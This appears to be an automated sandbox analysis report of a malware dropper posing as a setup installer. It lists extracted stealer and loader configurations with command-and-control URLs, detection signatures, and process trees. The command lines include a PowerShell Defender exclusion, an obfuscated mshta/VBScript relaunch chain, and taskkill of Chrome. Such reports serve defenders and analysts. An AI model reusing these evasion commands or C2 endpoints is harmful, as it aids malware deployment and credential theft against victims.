Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
91s -
max time network
132s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
08-10-2021 05:38
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Extracted
redline
media214
91.121.67.60:2151
Extracted
smokeloader
2020
http://gmpeople.com/upload/
http://mile48.com/upload/
http://lecanardstsornin.com/upload/
http://m3600.com/upload/
http://camasirx.com/upload/
Extracted
raccoon
1.8.2
3a6818b104313fce1772361ea1977d608ac93da0
-
url4cnc
http://teletop.top/kaba4ello
http://teleta.top/kaba4ello
https://t.me/kaba4ello
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4220 3872 rundll32.exe 113 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral7/memory/3608-273-0x000000000041B23A-mapping.dmp family_redline behavioral7/memory/3608-271-0x0000000000400000-0x0000000000422000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral7/files/0x000400000001abf9-153.dat family_socelars behavioral7/files/0x000400000001abf9-176.dat family_socelars -
Arkei Stealer Payload 1 IoCs
resource yara_rule behavioral7/memory/2424-430-0x0000000000400000-0x0000000004A15000-memory.dmp family_arkei -
Vidar Stealer 2 IoCs
resource yara_rule behavioral7/memory/1728-234-0x0000000004B50000-0x0000000004C26000-memory.dmp family_vidar behavioral7/memory/1728-236-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar -
resource yara_rule behavioral7/files/0x000500000001abeb-123.dat aspack_v212_v242 behavioral7/files/0x000500000001abeb-125.dat aspack_v212_v242 behavioral7/files/0x000400000001abec-122.dat aspack_v212_v242 behavioral7/files/0x000400000001abec-128.dat aspack_v212_v242 behavioral7/files/0x000400000001abf0-129.dat aspack_v212_v242 behavioral7/files/0x000400000001abf0-130.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 14 IoCs
pid Process 4028 setup_installer.exe 372 setup_install.exe 960 Thu16205451b994.exe 352 Thu161580bf75.exe 3576 Thu16f584bd3686.exe 4084 Thu165bd34b1e1d4d81.exe 2404 Thu166f9a8bbe80.exe 820 Thu16466b26f8b7.exe 932 Thu1653d94a8da.exe 2424 oaK5D0O7uVKGTFBKGnaZ7dN4.exe 1400 Thu16f3de88a335950bb.exe 1728 Thu1628aafb3efd7c3d.exe 1608 Thu167d514d2a7ac5a.exe 3044 Thu16f3de88a335950bb.tmp -
Loads dropped DLL 5 IoCs
pid Process 372 setup_install.exe 372 setup_install.exe 372 setup_install.exe 372 setup_install.exe 372 setup_install.exe -
resource yara_rule behavioral7/files/0x000400000001ac15-257.dat themida behavioral7/files/0x000400000001ac18-272.dat themida behavioral7/memory/4228-300-0x0000000000E30000-0x0000000000E31000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 29 ip-api.com 47 ipinfo.io 48 ipinfo.io 52 api.db-ip.com 53 api.db-ip.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 11 IoCs
pid pid_target Process procid_target 5012 960 WerFault.exe 86 4872 1728 WerFault.exe 94 4824 960 WerFault.exe 86 2092 960 WerFault.exe 86 1920 960 WerFault.exe 86 5188 960 WerFault.exe 86 5588 5124 WerFault.exe 160 6032 960 WerFault.exe 86 5696 960 WerFault.exe 86 6072 960 WerFault.exe 86 6060 2424 WerFault.exe 133 -
Kills process with taskkill 3 IoCs
pid Process 3632 taskkill.exe 4280 taskkill.exe 5520 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 4084 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 4084 Thu165bd34b1e1d4d81.exe Token: 31 4084 Thu165bd34b1e1d4d81.exe Token: 32 4084 Thu165bd34b1e1d4d81.exe Token: 33 4084 Thu165bd34b1e1d4d81.exe Token: 34 4084 Thu165bd34b1e1d4d81.exe Token: 35 4084 Thu165bd34b1e1d4d81.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2396 wrote to memory of 4028 2396 setup_x86_x64_install.exe 70 PID 2396 wrote to memory of 4028 2396 setup_x86_x64_install.exe 70 PID 2396 wrote to memory of 4028 2396 setup_x86_x64_install.exe 70 PID 4028 wrote to memory of 372 4028 setup_installer.exe 71 PID 4028 wrote to memory of 372 4028 setup_installer.exe 71 PID 4028 wrote to memory of 372 4028 setup_installer.exe 71 PID 372 wrote to memory of 3556 372 setup_install.exe 74 PID 372 wrote to memory of 3556 372 setup_install.exe 74 PID 372 wrote to memory of 3556 372 setup_install.exe 74 PID 372 wrote to memory of 3316 372 setup_install.exe 75 PID 372 wrote to memory of 3316 372 setup_install.exe 75 PID 372 wrote to memory of 3316 372 setup_install.exe 75 PID 372 wrote to memory of 3592 372 setup_install.exe 80 PID 372 wrote to memory of 3592 372 setup_install.exe 80 PID 372 wrote to memory of 3592 372 setup_install.exe 80 PID 372 wrote to memory of 424 372 setup_install.exe 76 PID 372 wrote to memory of 424 372 setup_install.exe 76 PID 372 wrote to memory of 424 372 setup_install.exe 76 PID 372 wrote to memory of 3992 372 setup_install.exe 77 PID 372 wrote to memory of 3992 372 setup_install.exe 77 PID 372 wrote to memory of 3992 372 setup_install.exe 77 PID 372 wrote to memory of 1568 372 setup_install.exe 78 PID 372 wrote to memory of 1568 372 setup_install.exe 78 PID 372 wrote to memory of 1568 372 setup_install.exe 78 PID 372 wrote to memory of 2824 372 setup_install.exe 79 PID 372 wrote to memory of 2824 372 setup_install.exe 79 PID 372 wrote to memory of 2824 372 setup_install.exe 79 PID 372 wrote to memory of 2612 372 setup_install.exe 87 PID 372 wrote to memory of 2612 372 setup_install.exe 87 PID 372 wrote to memory of 2612 372 setup_install.exe 87 PID 372 wrote to memory of 2044 372 setup_install.exe 81 PID 372 wrote to memory of 2044 372 setup_install.exe 81 PID 372 wrote to memory of 2044 372 setup_install.exe 81 PID 372 wrote to memory of 1488 372 setup_install.exe 82 PID 372 wrote to memory of 1488 372 setup_install.exe 82 PID 372 wrote to memory of 1488 372 setup_install.exe 82 PID 372 wrote to memory of 1732 372 setup_install.exe 85 PID 372 wrote to memory of 1732 372 setup_install.exe 85 PID 372 wrote to memory of 1732 372 setup_install.exe 85 PID 3592 wrote to memory of 960 3592 cmd.exe 86 PID 3592 wrote to memory of 960 3592 cmd.exe 86 PID 3592 wrote to memory of 960 3592 cmd.exe 86 PID 424 wrote to memory of 352 424 cmd.exe 84 PID 424 wrote to memory of 352 424 cmd.exe 84 PID 372 wrote to memory of 1220 372 setup_install.exe 83 PID 372 wrote to memory of 1220 372 setup_install.exe 83 PID 372 wrote to memory of 1220 372 setup_install.exe 83 PID 2612 wrote to memory of 3576 2612 cmd.exe 98 PID 2612 wrote to memory of 3576 2612 cmd.exe 98 PID 3316 wrote to memory of 2404 3316 cmd.exe 97 PID 3316 wrote to memory of 2404 3316 cmd.exe 97 PID 3316 wrote to memory of 2404 3316 cmd.exe 97 PID 1568 wrote to memory of 4084 1568 cmd.exe 88 PID 1568 wrote to memory of 4084 1568 cmd.exe 88 PID 1568 wrote to memory of 4084 1568 cmd.exe 88 PID 2824 wrote to memory of 820 2824 cmd.exe 96 PID 2824 wrote to memory of 820 2824 cmd.exe 96 PID 2824 wrote to memory of 820 2824 cmd.exe 96 PID 1732 wrote to memory of 932 1732 cmd.exe 89 PID 1732 wrote to memory of 932 1732 cmd.exe 89 PID 1732 wrote to memory of 932 1732 cmd.exe 89 PID 1488 wrote to memory of 2424 1488 cmd.exe 133 PID 1488 wrote to memory of 2424 1488 cmd.exe 133 PID 1488 wrote to memory of 2424 1488 cmd.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4028 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:3556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:1680
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
PID:2404 -
C:\Users\Admin\Pictures\Adobe Films\N_TyAVmxzhOUw2TvvAi5TRbz.exe"C:\Users\Admin\Pictures\Adobe Films\N_TyAVmxzhOUw2TvvAi5TRbz.exe"6⤵PID:4336
-
-
C:\Users\Admin\Pictures\Adobe Films\oaK5D0O7uVKGTFBKGnaZ7dN4.exe"C:\Users\Admin\Pictures\Adobe Films\oaK5D0O7uVKGTFBKGnaZ7dN4.exe"6⤵
- Executes dropped EXE
PID:2424 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 13207⤵
- Program crash
PID:6060
-
-
-
C:\Users\Admin\Pictures\Adobe Films\KpQcb2p8ldvKORt9VApBevSL.exe"C:\Users\Admin\Pictures\Adobe Films\KpQcb2p8ldvKORt9VApBevSL.exe"6⤵PID:4488
-
-
C:\Users\Admin\Pictures\Adobe Films\e2ZOhELtIoeoDjCy2TX5s9Po.exe"C:\Users\Admin\Pictures\Adobe Films\e2ZOhELtIoeoDjCy2TX5s9Po.exe"6⤵PID:3844
-
-
C:\Users\Admin\Pictures\Adobe Films\mCktOc4UxxJNTcNIlFxoqMth.exe"C:\Users\Admin\Pictures\Adobe Films\mCktOc4UxxJNTcNIlFxoqMth.exe"6⤵PID:4644
-
-
C:\Users\Admin\Pictures\Adobe Films\7EAoL70N_W2qyITO5_Yait31.exe"C:\Users\Admin\Pictures\Adobe Films\7EAoL70N_W2qyITO5_Yait31.exe"6⤵PID:4932
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:1404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\yrbbXJlWxjkW8lxmfrlgAIQF.exe"C:\Users\Admin\Pictures\Adobe Films\yrbbXJlWxjkW8lxmfrlgAIQF.exe"6⤵PID:5104
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"7⤵PID:6112
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"6⤵PID:748
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵PID:2136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ("C:\Users\Admin\Pictures\Adobe Films\CMqGH5hQvycRIfatzLgANbsT.exe") do taskkill /f /Im "%~nxQ"8⤵PID:2092
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵PID:4628
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE (CrEATEoBjeCT ( "wsCrIpt.shELl" ).RUn( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if ""-pb0sP2z4l4ZpZ1d2K9 "" == """" for %Q IN ( ""C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))10⤵PID:4632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "-pb0sP2z4l4ZpZ1d2K9 " == "" for %Q IN ("C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE") do taskkill /f /Im "%~nxQ"11⤵PID:1732
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "CMqGH5hQvycRIfatzLgANbsT.exe"9⤵
- Kills process with taskkill
PID:5520
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\U8iYjPAjOp4Gqwzn6LNHEAI6.exe"C:\Users\Admin\Pictures\Adobe Films\U8iYjPAjOp4Gqwzn6LNHEAI6.exe"6⤵PID:1208
-
-
C:\Users\Admin\Pictures\Adobe Films\xzhUawI0RVtPnQScGRybXKza.exe"C:\Users\Admin\Pictures\Adobe Films\xzhUawI0RVtPnQScGRybXKza.exe"6⤵PID:5124
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5124 -s 2487⤵
- Program crash
PID:5588
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_uQwgrsB4ygl2XZ0DRvHDZUg.exe"C:\Users\Admin\Pictures\Adobe Films\_uQwgrsB4ygl2XZ0DRvHDZUg.exe"6⤵PID:5164
-
-
C:\Users\Admin\Pictures\Adobe Films\n2kKZ9S58mXb8ojP9MAru7dC.exe"C:\Users\Admin\Pictures\Adobe Films\n2kKZ9S58mXb8ojP9MAru7dC.exe"6⤵PID:5112
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵PID:5712
-
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵PID:5692
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵PID:5684
-
-
-
C:\Users\Admin\Pictures\Adobe Films\fz2QtsnMS_QMhw6jBDQDGYeE.exe"C:\Users\Admin\Pictures\Adobe Films\fz2QtsnMS_QMhw6jBDQDGYeE.exe"6⤵PID:3792
-
-
C:\Users\Admin\Pictures\Adobe Films\DyAukkd2AQn5J8i3U5mhru38.exe"C:\Users\Admin\Pictures\Adobe Films\DyAukkd2AQn5J8i3U5mhru38.exe"6⤵PID:2336
-
-
C:\Users\Admin\Pictures\Adobe Films\Qz0c00__QPUdvilI_eHGRIa_.exe"C:\Users\Admin\Pictures\Adobe Films\Qz0c00__QPUdvilI_eHGRIa_.exe"6⤵PID:5292
-
-
C:\Users\Admin\Pictures\Adobe Films\MuqMS8dfzYZK2nr0zFucZurv.exe"C:\Users\Admin\Pictures\Adobe Films\MuqMS8dfzYZK2nr0zFucZurv.exe"6⤵PID:5240
-
-
C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"6⤵PID:5384
-
C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"C:\Users\Admin\Pictures\Adobe Films\NCztMQwImWoB2y1c1d6S14gA.exe"7⤵PID:5708
-
-
-
C:\Users\Admin\Pictures\Adobe Films\cw68SeIc7MdoIG18gQBC8VWI.exe"C:\Users\Admin\Pictures\Adobe Films\cw68SeIc7MdoIG18gQBC8VWI.exe"6⤵PID:5412
-
-
C:\Users\Admin\Pictures\Adobe Films\D38DTEuyn6q0yyNyVLYUx1sD.exe"C:\Users\Admin\Pictures\Adobe Films\D38DTEuyn6q0yyNyVLYUx1sD.exe"6⤵PID:5376
-
-
C:\Users\Admin\Pictures\Adobe Films\rchh_Tujf3jZhOUdWSyznt8P.exe"C:\Users\Admin\Pictures\Adobe Films\rchh_Tujf3jZhOUdWSyznt8P.exe"6⤵PID:5468
-
-
C:\Users\Admin\Pictures\Adobe Films\tq_agUgFY_2YYX_Y9pFeQ_1m.exe"C:\Users\Admin\Pictures\Adobe Films\tq_agUgFY_2YYX_Y9pFeQ_1m.exe"6⤵PID:5556
-
-
C:\Users\Admin\Pictures\Adobe Films\dvMzKl2KLOgAdPQgoGEqEphj.exe"C:\Users\Admin\Pictures\Adobe Films\dvMzKl2KLOgAdPQgoGEqEphj.exe"6⤵PID:5668
-
-
C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"6⤵PID:5700
-
C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"C:\Users\Admin\Pictures\Adobe Films\PGLlsL2mJKZoDvRnW9GK0vn7.exe"7⤵PID:2200
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7rF_EvX6F7_IRQhYohIQiewX.exe"C:\Users\Admin\Pictures\Adobe Films\7rF_EvX6F7_IRQhYohIQiewX.exe"6⤵PID:5656
-
-
C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"C:\Users\Admin\Pictures\Adobe Films\v8w4_mm0XuMfXNyW19VwK8Dy.exe"6⤵PID:5288
-
-
C:\Users\Admin\Pictures\Adobe Films\xJLyeR6evp4qCYSoY0YUvkhD.exe"C:\Users\Admin\Pictures\Adobe Films\xJLyeR6evp4qCYSoY0YUvkhD.exe"6⤵PID:2124
-
-
C:\Users\Admin\Pictures\Adobe Films\egdIOc3XR2x40DYlMdbplJev.exe"C:\Users\Admin\Pictures\Adobe Films\egdIOc3XR2x40DYlMdbplJev.exe"6⤵PID:4028
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:424 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
PID:352 -
C:\Users\Admin\AppData\Roaming\7847642.scr"C:\Users\Admin\AppData\Roaming\7847642.scr" /S6⤵PID:3624
-
-
C:\Users\Admin\AppData\Roaming\5980817.scr"C:\Users\Admin\AppData\Roaming\5980817.scr" /S6⤵PID:604
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:4596
-
-
-
C:\Users\Admin\AppData\Roaming\5536317.scr"C:\Users\Admin\AppData\Roaming\5536317.scr" /S6⤵PID:4228
-
-
C:\Users\Admin\AppData\Roaming\1357541.scr"C:\Users\Admin\AppData\Roaming\1357541.scr" /S6⤵PID:4364
-
-
C:\Users\Admin\AppData\Roaming\6906437.scr"C:\Users\Admin\AppData\Roaming\6906437.scr" /S6⤵PID:4580
-
C:\Users\Admin\AppData\Roaming\6906437.scr"C:\Users\Admin\AppData\Roaming\6906437.scr"7⤵PID:6008
-
-
-
C:\Users\Admin\AppData\Roaming\3730650.scr"C:\Users\Admin\AppData\Roaming\3730650.scr" /S6⤵PID:4752
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵PID:3992
-
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
PID:1728 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 11646⤵
- Program crash
PID:4872
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4084 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:348
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4280
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2824 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
PID:820
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
PID:960 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 6566⤵
- Program crash
PID:5012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 6926⤵
- Program crash
PID:4824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 8086⤵
- Program crash
PID:2092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 7886⤵
- Program crash
PID:1920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 8446⤵
- Program crash
PID:5188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 8926⤵
- Program crash
PID:6032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 11846⤵
- Program crash
PID:5696
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 12526⤵
- Program crash
PID:6072
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe5⤵
- Executes dropped EXE
PID:1400 -
C:\Users\Admin\AppData\Local\Temp\is-OLRAF.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-OLRAF.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3005E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f3de88a335950bb.exe"6⤵
- Executes dropped EXE
PID:3044 -
C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f3de88a335950bb.exe" /SILENT7⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\is-HA0H4.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-HA0H4.tmp\Thu16f3de88a335950bb.tmp" /SL5="$50056,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zSCBFF01F5\Thu16f3de88a335950bb.exe" /SILENT8⤵PID:2348
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart9⤵PID:4816
-
C:\63dc5cd0cbc2747555317f7f\Setup.exeC:\63dc5cd0cbc2747555317f7f\\Setup.exe /q /norestart /x86 /x64 /web10⤵PID:2828
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss19⤵PID:4772
-
-
C:\Users\Admin\AppData\Local\Temp\is-UKVSP.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-UKVSP.tmp\postback.exe" ss19⤵PID:4724
-
-
-
-
-
-
